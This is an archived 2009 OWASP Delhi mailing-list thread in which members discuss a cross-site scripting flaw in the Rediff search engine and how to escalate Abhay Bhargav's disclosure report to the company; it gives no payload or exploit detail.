[Owasp-delhi] Rediff Search engine XSS Vulnerability

SISA Abhay Bhargav ab at sisa.co.in
Mon May 18 02:26:27 EDT 2009

This is what I reported to Rediff


Name: Abhay Bhargav

Phone Number: -

message : While I was using rediff search engine to research material for
cross site scripting and output encoding, i came across a security flaw in
the rediff search engine. It does not encode output properly and as a result
is vulnerable to Cross Site Scripting vulnerabilities which are stored in
different websites. Please get your developers to correct this soon as it is
a serious security flaw. Please contact me for any assistance in this




Abhay Bhargav


 <http://www.sisa.co.in/> cid:image002.jpg at 01C97D81.CC02AB70

SISA Information Security (P) Ltd| Ph 91 80 41153769| Fx 91 80 41153796




From: Nitin Saxena [mailto:nitins at cybermedia.co.in] 
Sent: Monday, May 18, 2009 10:55 AM
To: nileshkumar83 at gmail.com; Abhay Bhargav
Cc: owasp-delhi at lists.owasp.org
Subject: Re: [Owasp-delhi] Rediff Search engine XSS Vulnerability


Abhay / Nilesh,


Let me take this to there higher authorities, can you help me by passing on
the communications that you have sent to Rediff.com initially.



Nitin Saxena

Lead Events and Communications Committee

OWASP Delhi Chapter

----- Original Message ----- 

From: nileshkumar83 at gmail.com 

To: Abhay Bhargav <mailto:ab at sisa.co.in>  

Cc: owasp-delhi at lists.owasp.org 

Sent: Saturday, May 16, 2009 11:35 AM

Subject: Re: [Owasp-delhi] Rediff Search engine XSS Vulnerability


Yes Abhay,  I agree, but they don't seem to be agree with us! :)
Have you reported them the issue? I doubt they will work on it. 

Thanks & Regards,
Nilesh Kumar,
Security Specialist | Governance Risk Compliance
Mobile- +91-9891524880


Owasp-delhi mailing list
Owasp-delhi at lists.owasp.org

-------------- next part --------------
An HTML attachment was scrubbed...
URL: https://lists.owasp.org/pipermail/owasp-delhi/attachments/20090518/54447b5b/attachment-0001.html 
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: image/jpeg
Size: 1875 bytes
Desc: not available
Url : https://lists.owasp.org/pipermail/owasp-delhi/attachments/20090518/54447b5b/attachment-0001.jpe 

More information about the Owasp-delhi mailing list